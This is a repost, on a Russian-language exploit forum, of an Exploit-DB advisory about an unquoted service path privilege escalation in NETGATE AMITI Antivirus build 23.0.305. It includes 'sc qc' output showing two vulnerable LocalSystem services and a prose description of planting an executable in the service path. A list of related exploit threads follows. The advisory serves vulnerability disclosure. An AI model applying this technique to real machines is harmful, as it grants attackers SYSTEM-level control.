Exploit NETGATE AMITI Antivirus 23.0.305 - Unquoted Service Path Privilege Escalation

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
40540
Проверка EDB
  1. Пройдено
Автор
AMIR.GHT
Тип уязвимости
LOCAL
Платформа
WINDOWS
CVE
N/A
Дата публикации
2016-10-15
NETGATE AMITI Antivirus 23.0.305 - Unquoted Service Path Privilege Escalation
Код: 
#########################################################################
# Exploit Title: NETGATE AMITI Antivirus Unquoted Service Path Privilege Escalation
# Date: 15/10/2016
# Author: Amir.ght
# Vendor Homepage: http://www.netgate.sk/
# Software Link: http://www.netgate.sk/download/download.php?id=11
# Version : build 23.0.305  (Latest)
# Tested on: Windows 7
##########################################################################

AMITI Antivirus installs two service with an unquoted service path
To properly exploit this vulnerability,
the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.
-------------------------------------------
C:\>sc qc AmitiAvSrv
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: AmitiAvSrv
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\NETGATE\Amiti
Antivirus\AmitiAntivirusSrv.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Amiti Antivirus Engine Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>sc qc AmitiAvHealth
[SC] QueryServiceConfig SUCCESS
----------------------------------------------------
SERVICE_NAME: AmitiAvHealth
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\NETGATE\Amiti
Antivirus\AmitiAntivirusHealth.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Amiti Antivirus Health Check
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation
Ответы
0
Просмотры
606
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit NETGATE Registry Cleaner 16.0.205 - Unquoted Service Path Privilege Escalation
Ответы
0
Просмотры
603
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Kingsoft Antivirus/Internet Security 9+ - Local Privilege Escalation
Ответы
0
Просмотры
646
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Symantec AntiVirus - PowerPoint Misaligned Stream-cache Remote Stack Buffer Overflow (PoC)
Ответы
0
Просмотры
598
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Symantec AntiVirus - Heap Overflow Modifying MIME Messages
Ответы
0
Просмотры
601
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Symantec AntiVirus - TNEF Decoder Integer Overflow
Ответы
0
Просмотры
595
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Symantec AntiVirus - Missing Bounds Checks in dec2zip ALPkOldFormatDecompressor::UnShrink
Ответы
0
Просмотры
594
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Symantec AntiVirus - Unpacking RAR Multiple Remote Memory Corruptions
Ответы
0
Просмотры
604
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Symantec AntiVirus - 'dec2lha Library' Remote Stack Buffer Overflow (PoC)
Ответы
0
Просмотры
615
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Symantec/Norton AntiVirus - ASPack Remote Heap/Pool Memory Corruption
Ответы
0
Просмотры
453
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу